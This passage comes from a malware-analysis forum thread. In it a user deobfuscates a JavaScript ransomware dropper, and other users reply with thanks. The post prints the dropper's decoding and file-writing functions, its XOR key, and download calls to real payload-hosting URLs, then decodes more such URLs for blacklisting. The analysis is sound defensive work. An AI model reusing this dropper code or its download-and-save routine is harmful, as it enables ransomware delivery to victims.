-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102);

var VITKI, VITKSn = VITKS.length;
for (VITKI= 0; VITKI < VITKSn; ++VITKI) {

VITKS[VITKI] = VITKS[VITKI] + 101;
}

3) Let's look at the Script - Long String decoded :

What look likes the VERY long string once decoded ?

function rtfta(filePath) {

var rosteks = WScript["CreateObject"]("ADODB.Stream");
rosteks["type"] = 2;
rosteks["Charset"] = 437;
rosteks["open"]();
rosteks["LoadFromFile"](filePath);
var fileString = rosteks["ReadText"];
rosteks["close"]();
return fsta(fileString);
};

function fsta(fileString) {

var t1 = new Array();

t1[0xC7] = 0x80;
t1[0xFC] = 0x81;
t1[0xE9] = 0x82;
t1[0xE2] = 0x83;
t1[0xE4] = 0x84;
t1[0xE0] = 0x85;
t1[0xE5] = 0x86;
t1[0xE7] = 0x87;
t1[0xEA] = 0x88;
t1[0xEB] = 0x89;
t1[0xE8] = 0x8A;
t1[0xEF] = 0x8B;
t1[0xEE] = 0x8C;
t1[0xEC] = 0x8D;
t1[0xC4] = 0x8E;
t1[0xC5] = 0x8F;
t1[0xC9] = 0x90;
t1[0xE6] = 0x91;
t1[0xC6] = 0x92;
t1[0xF4] = 0x93;
t1[0xF6] = 0x94;
t1[0xF2] = 0x95;
t1[0xFB] = 0x96;
t1[0xF9] = 0x97;
t1[0xFF] = 0x98;
t1[0xD6] = 0x99;
t1[0xDC] = 0x9A;
t1[0xA2] = 0x9B;
t1[0xA3] = 0x9C;
t1[0xA5] = 0x9D;
t1[0x20A7] = 0x9E;
t1[0x192] = 0x9F;
t1[0xE1] = 0xA0;
t1[0xED] = 0xA1;
t1[0xF3] = 0xA2;
t1[0xFA] = 0xA3;
t1[0xF1] = 0xA4;
t1[0xD1] = 0xA5;
t1[0xAA] = 0xA6;
t1[0xBA] = 0xA7;
t1[0xBF] = 0xA8;
t1[0x2310] = 0xA9;
t1[0xAC] = 0xAA;
t1[0xBD] = 0xAB;
t1[0xBC] = 0xAC;
t1[0xA1] = 0xAD;
t1[0xAB] = 0xAE;
t1[0xBB] = 0xAF;
t1[0x2591] = 0xB0;
t1[0x2592] = 0xB1;
t1[0x2593] = 0xB2;
t1[0x2502] = 0xB3;
t1[0x2524] = 0xB4;
t1[0x2561] = 0xB5;
t1[0x2562] = 0xB6;
t1[0x2556] = 0xB7;
t1[0x2555] = 0xB8;
t1[0x2563] = 0xB9;
t1[0x2551] = 0xBA;
t1[0x2557] = 0xBB;
t1[0x255D] = 0xBC;
t1[0x255C] = 0xBD;
t1[0x255B] = 0xBE;
t1[0x2510] = 0xBF;
t1[0x2514] = 0xC0;
t1[0x2534] = 0xC1;
t1[0x252C] = 0xC2;
t1[0x251C] = 0xC3;
t1[0x2500] = 0xC4;
t1[0x253C] = 0xC5;
t1[0x255E] = 0xC6;
t1[0x255F] = 0xC7;
t1[0x255A] = 0xC8;
t1[0x2554] = 0xC9;
t1[0x2569] = 0xCA;
t1[0x2566] = 0xCB;
t1[0x2560] = 0xCC;
t1[0x2550] = 0xCD;
t1[0x256C] = 0xCE;
t1[0x2567] = 0xCF;
t1[0x2568] = 0xD0;
t1[0x2564] = 0xD1;
t1[0x2565] = 0xD2;
t1[0x2559] = 0xD3;
t1[0x2558] = 0xD4;
t1[0x2552] = 0xD5;
t1[0x2553] = 0xD6;
t1[0x256B] = 0xD7;
t1[0x256A] = 0xD8;
t1[0x2518] = 0xD9;
t1[0x250C] = 0xDA;
t1[0x2588] = 0xDB;
t1[0x2584] = 0xDC;
t1[0x258C] = 0xDD;
t1[0x2590] = 0xDE;
t1[0x2580] = 0xDF;
t1[0x3B1] = 0xE0;
t1[0xDF] = 0xE1;
t1[0x393] = 0xE2;
t1[0x3C0] = 0xE3;
t1[0x3A3] = 0xE4;
t1[0x3C3] = 0xE5;
t1[0xB5] = 0xE6;
t1[0x3C4] = 0xE7;
t1[0x3A6] = 0xE8;
t1[0x398] = 0xE9;
t1[0x3A9] = 0xEA;
t1[0x3B4] = 0xEB;
t1[0x221E] = 0xEC;
t1[0x3C6] = 0xED;
t1[0x3B5] = 0xEE;
t1[0x2229] = 0xEF;
t1[0x2261] = 0xF0;
t1[0xB1] = 0xF1;
t1[0x2265] = 0xF2;
t1[0x2264] = 0xF3;
t1[0x2320] = 0xF4;
t1[0x2321] = 0xF5;
t1[0xF7] = 0xF6;
t1[0x2248] = 0xF7;
t1[0xB0] = 0xF8;
t1[0x2219] = 0xF9;
t1[0xB7] = 0xFA;
t1[0x221A] = 0xFB;
t1[0x207F] = 0xFC;
t1[0xB2] = 0xFD;
t1[0x25A0] = 0xFE;
t1[0xA0] = 0xFF;

var resultArray = new Array();
for (var Tj = 0; Tj < fileString["length"]; Tj++) {
var OVc9 = fileString["charCodeAt"](Tj);
if (OVc9 < 128) {
var HIi3 = OVc9;
} else {
var HIi3 = t1[OVc9];
}
resultArray["push"](HIi3);
};

return resultArray;
};

function fats(codeArray) {

var t2 = new Array();

t2[0x80] = 0x00C7;
t2[0x81] = 0x00FC;
t2[0x82] = 0x00E9;
t2[0x83] = 0x00E2;
t2[0x84] = 0x00E4;
t2[0x85] = 0x00E0;
t2[0x86] = 0x00E5;
t2[0x87] = 0x00E7;
t2[0x88] = 0x00EA;
t2[0x89] = 0x00EB;
t2[0x8A] = 0x00E8;
t2[0x8B] = 0x00EF;
t2[0x8C] = 0x00EE;
t2[0x8D] = 0x00EC;
t2[0x8E] = 0x00C4;
t2[0x8F] = 0x00C5;
t2[0x90] = 0x00C9;
t2[0x91] = 0x00E6;
t2[0x92] = 0x00C6;
t2[0x93] = 0x00F4;
t2[0x94] = 0x00F6;
t2[0x95] = 0x00F2;
t2[0x96] = 0x00FB;
t2[0x97] = 0x00F9;
t2[0x98] = 0x00FF;
t2[0x99] = 0x00D6;
t2[0x9A] = 0x00DC;
t2[0x9B] = 0x00A2;
t2[0x9C] = 0x00A3;
t2[0x9D] = 0x00A5;
t2[0x9E] = 0x20A7;
t2[0x9F] = 0x0192;
t2[0xA0] = 0x00E1;
t2[0xA1] = 0x00ED;
t2[0xA2] = 0x00F3;
t2[0xA3] = 0x00FA;
t2[0xA4] = 0x00F1;
t2[0xA5] = 0x00D1;
t2[0xA6] = 0x00AA;
t2[0xA7] = 0x00BA;
t2[0xA8] = 0x00BF;
t2[0xA9] = 0x2310;
t2[0xAA] = 0x00AC;
t2[0xAB] = 0x00BD;
t2[0xAC] = 0x00BC;
t2[0xAD] = 0x00A1;
t2[0xAE] = 0x00AB;
t2[0xAF] = 0x00BB;
t2[0xB0] = 0x2591;
t2[0xB1] = 0x2592;
t2[0xB2] = 0x2593;
t2[0xB3] = 0x2502;
t2[0xB4] = 0x2524;
t2[0xB5] = 0x2561;
t2[0xB6] = 0x2562;
t2[0xB7] = 0x2556;
t2[0xB8] = 0x2555;
t2[0xB9] = 0x2563;
t2[0xBA] = 0x2551;
t2[0xBB] = 0x2557;
t2[0xBC] = 0x255D;
t2[0xBD] = 0x255C;
t2[0xBE] = 0x255B;
t2[0xBF] = 0x2510;
t2[0xC0] = 0x2514;
t2[0xC1] = 0x2534;
t2[0xC2] = 0x252C;
t2[0xC3] = 0x251C;
t2[0xC4] = 0x2500;
t2[0xC5] = 0x253C;
t2[0xC6] = 0x255E;
t2[0xC7] = 0x255F;
t2[0xC8] = 0x255A;
t2[0xC9] = 0x2554;
t2[0xCA] = 0x2569;
t2[0xCB] = 0x2566;
t2[0xCC] = 0x2560;
t2[0xCD] = 0x2550;
t2[0xCE] = 0x256C;
t2[0xCF] = 0x2567;
t2[0xD0] = 0x2568;
t2[0xD1] = 0x2564;
t2[0xD2] = 0x2565;
t2[0xD3] = 0x2559;
t2[0xD4] = 0x2558;
t2[0xD5] = 0x2552;
t2[0xD6] = 0x2553;
t2[0xD7] = 0x256B;
t2[0xD8] = 0x256A;
t2[0xD9] = 0x2518;
t2[0xDA] = 0x250C;
t2[0xDB] = 0x2588;
t2[0xDC] = 0x2584;
t2[0xDD] = 0x258C;
t2[0xDE] = 0x2590;
t2[0xDF] = 0x2580;
t2[0xE0] = 0x03B1;
t2[0xE1] = 0x00DF;
t2[0xE2] = 0x0393;
t2[0xE3] = 0x03C0;
t2[0xE4] = 0x03A3;
t2[0xE5] = 0x03C3;
t2[0xE6] = 0x00B5;
t2[0xE7] = 0x03C4;
t2[0xE8] = 0x03A6;
t2[0xE9] = 0x0398;
t2[0xEA] = 0x03A9;
t2[0xEB] = 0x03B4;
t2[0xEC] = 0x221E;
t2[0xED] = 0x03C6;
t2[0xEE] = 0x03B5;
t2[0xEF] = 0x2229;
t2[0xF0] = 0x2261;
t2[0xF1] = 0x00B1;
t2[0xF2] = 0x2265;
t2[0xF3] = 0x2264;
t2[0xF4] = 0x2320;
t2[0xF5] = 0x2321;
t2[0xF6] = 0x00F7;
t2[0xF7] = 0x2248;
t2[0xF8] = 0x00B0;
t2[0xF9] = 0x2219;
t2[0xFA] = 0x00B7;
t2[0xFB] = 0x221A;
t2[0xFC] = 0x207F;
t2[0xFD] = 0x00B2;
t2[0xFE] = 0x25A0;
t2[0xFF] = 0x00A0;

var EGj = new Array();
var resultString = "";
var HIi3;
var OVc9;
for (var Tj = 0; Tj < codeArray["length"]; Tj++) {
HIi3 = codeArray[Tj];
if (HIi3 < 128) {
OVc9 = HIi3;
} else {
OVc9 = t2[HIi3];
}a
EGj.push(String["fromCharCode"](OVc9));
}

resultString = EGj["join"]("");

return resultString;
};

function satt(filePath, codeArray) {

var rosteks = WScript["CreateObject"]("ADODB.Stream");
rosteks["type"] = 2;
rosteks["Charset"] = 437;
rosteks["open"]();
rosteks["writeText"](fats(codeArray));
rosteks["SaveToFile"](filePath, 2);
rosteks["close"]();
};

function xdac(cca) {

for (var Tj = 0; Tj < cca["length"]; Tj++) {

cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];
}
return cca;
};

We can see well known functions used to make the obfuscated exe file (not seen as an exe file when downloaded, with content modified), becomes the real exe ransomware :

rtfta => load content payload content and call fsta(fileString)
xdac => deobfuscation with XOR function, using xKey Array
fsta => first "character substitution cipher" decoder, also use to obtain the xKey
fats => second "character substitution cipher" decoder
satt => calls fats function and save the file as real ".exe"

and xKey => used for the main XOR decode part

This last var is now in the main Script part :

var xKey = fsta("pxhMZi6AIY0OtsmRMnKeSwpSwoJtpSdT")

See this post : spoiler with details :

https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229

4) Are the URLS used well obfuscated ? :

From precedent analysis of analogue method :

try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

=> URLs obfuscation method : unescape Unicode
- Using the tool I linked in part (1) :

http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"

This time they have "encoded" the URLS and we need the Decode function to now what chars have to be deleted before the Base64 Decode :

"GIBDDSHNIK" has to be delete

But we can recognize the same structure with a loop used

- Shtyler4 => _a2
- 3 strings in a tab => 3 urls to retrieve the payload

This time, one file name for the payload , and not three time the same payload with 3 different name once downloaded...

var _a5 = ["bWFqLmNsYWFzLmZyL0hKZ2hqYjGIBDDSHNIKU0","a291dG9rdWthbi53ZWIuZmMyGIBDDSHNIKLmNvbS9ISmdoamI1NA==","emlrdW5vYW5hLmhvdWtvdS1vbmNoaGIBDDSHNIKS5jb20vSEpnaGpiNTQ="];

for(uueee in _a5){

try{

_a2("http://"+_a5[uueee].tttoooo() + "?nTStkY=KsBazYnqnR","qcoPPlYEo");
}catch(_a3){}
}

First Step :
'bWFqLmNsYWFzLmZyL0hKZ2hqYj~~GIBDDSHNIK~~U0'
"a291dG9rdWthbi53ZWIuZmMy~~GIBDDSHNIK~~LmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoa~~GIBDDSHNIK~~S5jb20vSEpnaGpiNTQ="

'bWFqLmNsYWFzLmZyL0hKZ2hqYjU0"
"a291dG9rdWthbi53ZWIuZmMyLmNvbS9ISmdoamI1NA=="
"emlrdW5vYW5hLmhvdWtvdS1vbmNoaS5jb20vSEpnaGpiNTQ="

Second step :

=> using the Base64 Decode tool from notepad++ :

maj.claas.fr/HJghjb54
koutokukan.web.fc2.com/HJghjb54
zikunoana.houkou-onchi.com/HJghjb54

Third Step : concatenation

URLS :

maj.claas.fr/HJghjb54?nTStkY=KsBazYnqnR
koutokukan.web.fc2.com/HJghjb54?nTStkY=KsBazYnqnR
zikunoana.houkou-onchi.com/HJghjb54

Payload => file : qcoPPlYEo : qcoPPlYEo.exe if correctly deobfuscated by the script

5) Conclusion :

A big difference with the previous analogue sample :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

On the first, they have put a lot of useless part / functions to more obfuscate the Script
The Urls and payload name was very easy to retrieve, without understand their Decode function and encoded parts.

In this sample, we have only to now that "GIBDDSHNIK" part to delete (all occurences)

But in this family of obfuscation :

We just have to find the .replace(/GIBDDSHNIK/g, '')

replace all occurence in the string we want to decode
copy-paste them on notepad++ (or another tool) => Base64 Decode

And get just after the URLS, to blacklist.

To be able to retrieve the deobfuscated payload, just a small part has to be modifying on the script :
- it is then downloaded, modified, but not run.

See my precedent analysis of analogue sample

Wow, that was a fast one! Thank you for sharing, amazing work as always, @DardiM

DardiM · Aug 23, 2016

Der.Reisende said:
Wow, that was a fast one! Thank you for sharing, amazing work as always, @DardiM

Thanks you

I have not yet finished with another analysis
https://malwaretips.com/threads/ana...cript-encoded-script-file-vbs-psyme-lv.62657/
but when I have seen this sample on the Malware Vault last post, I could not resist

bastienb · Aug 23, 2016

Thank you for this clear analysis.

DardiM · Aug 23, 2016

Big update

bastienb said:
Thank you for this clear analysis.

Happy you liked it

Search

Malware Analysis 824643807708.wsf-dropper-JS_NEMUCOD.SMK2

DardiM

Level 26

Der.Reisende

Level 45

DardiM

Level 26

bastienb

New Member

DardiM

Level 26

Similar threads